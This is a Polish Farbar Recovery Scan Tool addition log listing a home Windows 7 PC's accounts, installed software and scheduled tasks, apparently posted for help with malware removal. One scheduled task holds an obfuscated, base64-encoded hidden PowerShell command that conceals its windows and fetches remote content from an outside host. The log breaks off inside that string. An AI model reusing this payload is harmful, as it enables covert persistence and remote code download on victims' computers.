Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja:31-12-2015 Uruchomiony przez Piotrek (2016-01-05 20:19:25) Uruchomiony z C:\Users\Piotrek\Downloads Windows 7 Ultimate (X64) (2013-05-27 05:54:05) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1688851452-3417616463-1083969991-500 - Administrator - Disabled) Gość (S-1-5-21-1688851452-3417616463-1083969991-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1688851452-3417616463-1083969991-1002 - Limited - Enabled) Piotrek (S-1-5-21-1688851452-3417616463-1083969991-1000 - Administrator - Enabled) => C:\Users\Piotrek UpdatusUser (S-1-5-21-1688851452-3417616463-1083969991-1003 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.209 - Adobe Systems Incorporated) Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated) Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.228 - Adobe Systems Incorporated) Adobe Reader XI (11.0.13) - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated) Aktualizacje NVIDIA 4.11.9 (Version: 4.11.9 - NVIDIA Corporation) Hidden Angels vs Devils (HKLM-x32\...\{584204D4-9FF9-42FD-B3F7-51A9302947BB}) (Version: - ) Archiwizator WinRAR (HKLM\...\WinRAR archiver) (Version: - ) Bejeweled® 3 (HKLM-x32\...\{E99C27B2-EB2E-4244-9F5C-A96F55100F0C}) (Version: 1.1.13.4753 - Electronic Arts, Inc.) Call of Duty(R) 2 (HKLM-x32\...\InstallShield_{D0A05794-48C2-4424-A15A-9F20FCFDD374}) (Version: 1.00.0000 - ) Call of Duty(R) 2 (x32 Version: 1.00.0000 - ) Hidden CCleaner (HKLM\...\CCleaner) (Version: 4.02 - Piriform) Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Detektor Winampa (HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc) Detektor Winampa (HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc) Diablo II (HKLM-x32\...\Diablo II) (Version: - ) Don't Starve (HKLM-x32\...\Steam App 219740) (Version: - Klei Entertainment) Dying Light (HKLM-x32\...\Steam App 239140) (Version: - Techland) Easy CD-DA Extractor 16 (HKLM-x32\...\Easy CD-DA Extractor 16) (Version: 16 - Poikosoft) ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version: - ) ffdshow v1.2.4422 [2012-04-09] (HKLM-x32\...\ffdshow_is1) (Version: 1.2.4422.0 - ) Free Download Manager 3.9.2 (HKLM-x32\...\Free Download Manager_is1) (Version: - FreeDownloadManager.ORG) Glary Utilities 3 (v3.4.0.117) (HKLM-x32\...\Glary Utilities 3) (Version: 3.4.0.117 - Glarysoft Ltd) Gothic II - Noc Kruka (HKLM-x32\...\{6FB6D550-DDC4-4996-9CDF-91C34F0A4C4A}) (Version: 2.60.000 - ) Gothic III (HKLM-x32\...\{02B244A2-7F6A-42E8-A36F-8C385D7A1625}) (Version: 1.0.0 - JoWooD Productions Software AG) Java 8 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418045F0}) (Version: 8.0.450 - Oracle Corporation) Junk Mail filter update (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden KaM Remake Full r5503 (HKLM-x32\...\{FDE049C8-E4B2-4EB5-A534-CF5C581F5D32}_is1) (Version: - ) Knights and Merchants TPR (HKLM-x32\...\Knights and Merchants TPR) (Version: - ) Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve) MediaInfo 0.7.63 (HKLM\...\MediaInfo) (Version: 0.7.63 - MediaArea.net) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{929CE49F-1CA7-4CF3-A9A1-6D757443C63F}) (Version: 1.2.0241 - Microsoft Corporation) Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUSR) (Version: 15.0.4420.1017 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) MoD ImperiaL (remove only) (HKLM-x32\...\MoD ImperiaL) (Version: - ) MoD ImperiaL v4.1 (HKLM-x32\...\{C85B6A70-2ABB-4A31-8FD1-E183553A94F9}) (Version: 4.1 - TeaM ImperiaL) Mozilla Firefox 43.0.3 (x86 pl) (HKLM-x32\...\Mozilla Firefox 43.0.3 (x86 pl)) (Version: 43.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.3.5835 - Mozilla) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) NapiProjekt (2.1.0.2287) (HKLM-x32\...\NapiProjekt_is1) (Version: - ) Narzędzia sprawdzające pakietu Microsoft Office 2013 — polski (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG) NVIDIA GeForce Experience 1.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 1.5 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.12.1031 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.1031 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 320.18 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 320.18 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.24.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.24.2 - NVIDIA Corporation) NVIDIA Sterownik graficzny 320.18 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 320.18 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 320.18 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 320.18 - NVIDIA Corporation) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Opera Stable 34.0.2036.25 (HKLM-x32\...\Opera 34.0.2036.25) (Version: 34.0.2036.25 - Opera Software) Origin (HKLM-x32\...\Origin) (Version: 9.4.11.2806 - Electronic Arts, Inc.) Panel sterowania NVIDIA 320.18 (Version: 320.18 - NVIDIA Corporation) Hidden Poczta usługi Windows Live (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Podstawowe programy Windows Live (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation) Podstawowe programy Windows Live (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Polski pakiet językowy dla programu Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile PLK Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Polski pakiet językowy dla programu Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended PLK Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Praetorians (HKLM-x32\...\{AAC8AF92-DAEC-45D2-B77D-36699E3751A9}) (Version: - Pyro Studios) Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.61.612.2012 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6699 - Realtek Semiconductor Corp.) Risen (HKLM-x32\...\Steam App 40300) (Version: - Piranha – Bytes) SAGEM F@st 800-840 (HKLM-x32\...\{4AE3A0CB-87B0-4F51-BECD-3D1F8DFDD62F}) (Version: 4.06.000 - SAGEM) Splash PRO EX (HKLM-x32\...\Mirillis Splash PRO EX) (Version: 1.13.0 - Mirillis) Spotify (HKU\S-1-5-21-1688851452-3417616463-1083969991-1000\...\Spotify) (Version: 1.0.20.94.g8f8543b3 - Spotify AB) Spotify (HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\Spotify) (Version: 0.9.6.72.ge389c074 - Spotify AB) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) TeamSpeak 3 Client (HKU\S-1-5-21-1688851452-3417616463-1083969991-1003\...\TeamSpeak 3 Client) (Version: 3.0.13 - TeamSpeak Systems GmbH) Testy B 2015 (HKLM-x32\...\{51c8ad09-d9b5-478f-8dfe-6a5e040d7e7c}_is1) (Version: 6.1.5.96 - Grupa IMAGE Sp. z o.o.) Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb) Victoria 2 Złota Edycja (HKLM-x32\...\{2EB868AA-E626-4F5F-B9DF-F49637284721}) (Version: 3.1 - Paradox Interactive) VLC media player 2.0.6 (HKLM-x32\...\VLC media player) (Version: 2.0.6 - VideoLAN) Welcome App (Start-up experience) (x32 Version: 12.0.14000 - Nero AG) Hidden Winamp (HKLM-x32\...\Winamp) (Version: 5.63 - Nullsoft, Inc) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-1688851452-3417616463-1083969991-1000_Classes\CLSID\{869C14C8-1830-491F-B575-5F9AB40D2B42}\InprocServer32 -> C:\Program Files\MediaInfo\MediaInfo_InfoTip.dll (hxxp://mediainfo.sourceforge.net) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0DA05E06-0DF9-4FBB-A361-F40C26B2ED17} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_228_pepper.exe [2015-12-11] (Adobe Systems Incorporated) Task: {1F78BF23-CA52-4AE3-947B-7CC4E853CB78} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {20439A9F-BFA5-4B74-B07E-4265C5754A2F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-05-24] (Piriform Ltd) Task: {301C4831-D5DE-484D-8B62-D273C0A6CFE4} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation) Task: {3099DB57-7D57-4AC0-B900-414DA285B574} - System32\Tasks\GlaryInitialize 3 => C:\Program Files (x86)\Glary Utilities 3\Initialize.exe [2013-06-05] (Glarysoft Ltd) Task: {33028921-9473-4095-87DD-DB5F0F489DF7} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation) Task: {36821619-7E03-4D3F-8873-28552984991D} - System32\Tasks\{16E29C1D-B111-4D29-98B3-31467672C48F} => D:\Gry\MCFP\.minecraft\minecraft.exe Task: {50AFA8A0-0069-4EDC-A02A-8621BB11CAA1} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2015-04-30] (Oracle Corporation) Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto Task: {6A6DF8B4-2A90-4E21-B596-04C1638FE98D} - System32\Tasks\{1072ABFD-6AE8-428F-B82B-9BCCE6778225} => D:\Gry\Rexio\skarb\REKSIO_I_SKARB_PIRATOW\reksiopiraci.exe [2004-08-19] () Task: {8A9EB95E-F54D-4622-A482-319BD516773B} - System32\Tasks\GlaryUpdate 3 => C:\Program Files (x86)\Glary Utilities 3\CheckUpdate.exe [2013-06-05] (Glarysoft Ltd) Task: {9B543229-8C72-4900-85F7-622C5989DA19} - System32\Tasks\Opera scheduled Autoupdate 1412155155 => C:\Program Files (x86)\Opera\launcher.exe [2015-12-04] (Opera Software) Task: {9F836C55-250A-427C-8A13-A2E0C6EB7211} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated) Task: {A792E37B-B9EE-4772-98BA-4B03416EEF83} - System32\Tasks\{DC5C2946-C9DC-4619-95C5-4E6044934412} => D:\Gry\Km TPR\KM_TPR.exe [2001-11-29] () Task: {B2AD1289-5693-4DED-BC5D-144A1448F788} - System32\Tasks\ASUS\i-Setup075713 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.) Task: {D155A5A2-21C5-4E48-B961-54D5ED508E87} - System32\Tasks\{732CD97D-6685-424B-A9A9-A90955B22716} => D:\Gry\MCFP\.minecraft\minecraft.exe Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc Task: {EFE90BE3-99C3-44EF-B7AE-F2FD6E5A522F} - System32\Tasks\{F67D6DAF-1C74-86AE-ADDE-2D68DB5FE49C} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG0AbwBvAG4AYQBzAC4AaQBuAGYAbwAvAHUALwA/AHEAPQBaAEIANgBJAFIASQB1AEoAdgBVAHgAUABUAFMAdwA3AHEAeQBBAFcARQBqAGcAUAB3AE4ASgBUAEMAcAAtAE8AagBQAG8AMQBTAEUAYgBmAHkAMgA0ADEAcwBkAEUAbAA0AHEAcQBIADUAdABnAEQAMgBoADIAZAB5AHYANQB2AF8AVgB6AHgAbQBoAE8ATQB0AGwAZwA1AEwAawBiADUALQAtAGcAYwBYAGsAOQBmAE4AQQByAG8AMwBXAE0ATABTAFkAcABkAFIAeABFAHoAOQBHAEMARQBRAHIAdgBjAHYATwBFADAAMAAyAEwAbQBoAHgANQBRAEMAegBIAFkASgBsAEMAZgBXAFcANQBKAEkAbQBjAGwAWABBAGYAMABmAHEATABiAHEAUQAwADEAMAAxAGkAawBsAC0ATAByAGkARQBXAEQANgBBAGIASgB2ADEAUgA2ADgAWABtAGcAQQBWAC0AMABvAGgAeABSAEYAOAA2ADkAUQBxADUAWAAtAEIAbQBvADMARAA1AEwALQA4AFIAeQAyADEAMQAzAHAAegBlAGMAeABpAEgAcABMADQAZQBlAEkAWABZAHkAUAB4AGMAWgBrAGsATQBNAGMARgBaAEgAawBMAHMAYQBiAHIAeQBJAFUAVgBrAEsAegBBAC0AVgBLAFEAWQBUAEQAeQA1AGsAVQBSAFAAcABhAFQAawBBAEIAWABxAHoAZABkAEsAdQBYAHAATwBNAFgAWABFAEIAegBzADQAQQAyAHcAdgB1AGcASgA5ADIAaABRAGkANQBoAHUATQBUAEwAdQBJAG8AOABTAF8ASQBpAHEAVwBvADMAMwBPAFkAcAB6ADcAdQA3ADYARQB6AF8ATwBUAFcAOQB3AC0AaQB0AEMATAB1AEMAUgAxAEIAcAB3AEQAUwBsAEEAXwBtAHoARwBKADMASgBwADQAbQBsAFcASwBqAFEAbQAwAHIASwBMADIAVQB2AEwARABzAEoASABNAHUAXwBVAE8AWAA4AFcAdwB2AEgAQQA5AHcAUwBPAHQARAA3AFUAcQBlAEwAegBsADUAdQB4AEsAQQBjAEoAMQBxAEEAcwBrAGIAcQBBAE8ANwBIAGYAZgBkAFEAcgBuADEAcwBLADEAUQAwAGUARQBEAEUASwBhAHEAMgBiAHAAQQBTADEAcgBjAFkARQBpAHMAdAB6AE0AXwAwAHgAUABvACYAYwA9AGgAdQBkAFYAcwBCAG0ARQBpAGEAcQBIAG0AMwBQAGQASwA5AEIAagBsAGcAMQBaAFEATwB0ADkAZwBxAFcAcABoADUAZwBhADUAUwBuAGEAOQBLAG8AQgBwAHIAQgBMADYAQgBEAC0ASABYADQAVwBuAE4AOABjAEMAVgA1AHQAXwAwAE4AWABKAFEAcQAyAFAAdgB2AGkAbABEADgAcABkAFMAeABSAFcAeQA1AE0ANwBzAEgAbABVADcAWQBUADAAYwBWAGsANgB4ADMAegBoAE0ANAByADUAYQB2AHgAQQBBAGMAdgBGAHoAWQBkADIARwBGAF8ARwBiAFcATgBwAE4ATABvAG8ATQBMAEcAWQBrAHAALQBPAGUAcwBNAFkAbQB1AEIAVgB6AEMAcABFAFIAbABmAEgATgBIADYAdQBNAGsAUABoAEQAdgBUAGoARQBIAGUAUABuADMANgBCAEIAawBCAE0AaABtAGIAUABhAG8ATwB5ADgATQA3AHIAUQBCAEIAcQBGAG4AVABHAFoATQBvAEUAYgBVAHcATgBoAEQAQwBuAGsAeQB6AGQATQBlAEoARABPAHcASgAyADIARQBqAFIAbAA2AGcAagBIADkARAAzAGgAbwBPAHkAMwBHAHMAdQBpAHIATQBGADMAagBaADMAaQBLAE8ANQBnAGwAXwBjAEwAXwBtADMAaABpAGYATABBAEoAYwBvADMAVgBCAEIARgAtAEUAWQA1AFAANQBXAE4AawBEAFEAVwBmAE8ATwBLAEsAYwBTAHAAegBXADYAcAAyAFgARgBfAG0AagB5AEsARwBwAGsAVABpAEkASAB0AEcAMwBhADAATwBQAEwAdwBxAEIAdwBPAFYAaABPADgANgBLAG4AQQBPAHQAcQBLAC0AbgBTAF8AQgBMAHUAdQB0AE4AZABOADkAVQBoADQAYQBzAGwAdgBuAHUAWgBUAGsAVwBrAG4AZgAzAHgAawBiAFQAVgBiAEYAeQA3AFcATgB3AG0AdwA1AGYAaQBPAEwARgBCADgAZgA2AGMAaAB3AEwATgBwAGMANgBPAFcAeQAtAHMAeABWADMANwBmAEgATgByAGkAUwAtAFQAUwBJAFIAeQBtAGkAdAB6AF8AMABUAGsANgBZAEMAYQBjADEAZgBYAHEAUgBXAHQATAB2AFQATgBFAHYARgB5AE0AWABtAGgANQBTAEYAVgBKADgAaQByAGoAZQB0ADkANABIADgAMgBIAFIAVwAzAFcAWgB5AFAAWQA1AEsATgBrADIARwByAEgASgA1AHAAbQBXADYATwB4AGkAMwBEAHEAYwBqAEMAcwBOADYAYQBEAFAAZwBZAEcAbwBTADYAagAzAGQAcAByAHcALQA5AFYASgBxAEYAWQBuAFoAeQBLAGYAYgBKAGYAbABDAEsAVABPAGkARQBRAEIAQgA5AGUAZABvAHgAYwA3AEoAZwBEAEwAOQBHAEgANwA5AGYAWgBPAFUALQBRAGgAQwBLAGoAQgA1AHAAaAA2AE8AQwBNADkATQBlAEMAWABhAFMARQBiAFEAMwBLADIAeABIAG4AeQBYAFcAcQBGAG8AbgBaAGcAMgBUAGoAcABKAE8ARgBEADYASgBMAEcASAAtAFYAeAAwAGQAcABpAEYAUQBHAC0AbwAwAFgAegBtAGcANABnADgAdgBFAEcAWAA3AEkANABkAGUAMABRAG0AaQBfAGwAYwBUADkAawBrADEAWABGAFMARwBHAEMAcgBoAEgANQBEAGoASABrACYAcgA9ADUANwA4ADMANQA0ADAANQA5ADEAOQAxADEAOAAzADUANgA0ADIAIgA7ACQAcwB0AHMAawA9ACIAewBGADYANwBEADYARABBAEYALQAxAEMANwA0AC0AOAA2AEEARQAtAEEARABEAEUALQAyAEQANgA4AEQAQgA1AEYARQA0ADkAQwB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAG